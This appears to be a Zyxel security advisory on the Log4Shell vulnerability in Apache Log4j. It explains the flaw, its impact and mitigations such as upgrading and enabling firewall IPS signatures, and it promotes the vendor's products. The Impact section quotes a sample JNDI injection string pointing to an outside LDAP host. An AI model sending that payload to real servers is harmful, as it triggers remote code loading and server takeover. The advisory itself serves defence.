Guard against Log4Shell

Guard against Log4Shell

Vulnerable log4j Package

Log4j is an open-source project that is widely used for logging in JAVA. Log4j was found a remote code injection in the version between 2.x.x and 2.14.x. (However, a new exploit for log4j, CVE-2021-45046, was also found in 2.15. We recommend to update to the version 2.17). That allows attackers to send a special-formed command to get the remote shell (Log4shell) easily.

Impact

This vulnerability got the highest score (10) in CVSS since the log4j package is widely used and the vulnerability can be executed remotely. If the server is vulnerable, attackers can send commands (such as ${jndi:ldap:// example.com/a}) to the log4j package and get the shell to take over the server. As the host is compromised, the host could be used as a bot, miner or encrypted your important files by ransomware.

Products Against for Log4Shell

Zyxel is aware of remote code execution (RCE) vulnerabilities in Apache Log4j and confirms that all its security products are NOT affected [1]. Zyxel ATP/USG FLEX Series firewalls provide multiple layer protection to help you against the attack.

Mitigation

On host: Recommend to update to the latest version of Apache Log4j (>=2.17.0).

On Network:

  • To reduce the attack surface, don’t publish the vulnerable applications to Internet unless it's absolutely necessary. Leveraging the VPN technology for remote access to the applications.
  • Update to the latest version of IPS signature and then enable the IPS function to protect your host. If your host uses SSL/TLS transmission, you should also enable SSL inspection for further detection. When the attack comes from the malicious IP address, the IP reputation feature defenses you against the attack from the IP address.
  • Enable DNS filter, URL filter, Content Filter, AntiVirus and Sandbox features can also break the attack chain to avoid further infection.
Find out more about Zyxel Security

Please refer to the signature information

ATP/USGFLEX series:

v4.0.x.20211217.0

# Signature ID 131026, 131027 and 131028 are used for CVE-2021-44228.

# Signature ID 131029 and 131030 are used for CVE-2021-45046.

More information >

Reference

[1] Zyxel security advisory for Apache Log4j RCE vulnerabilities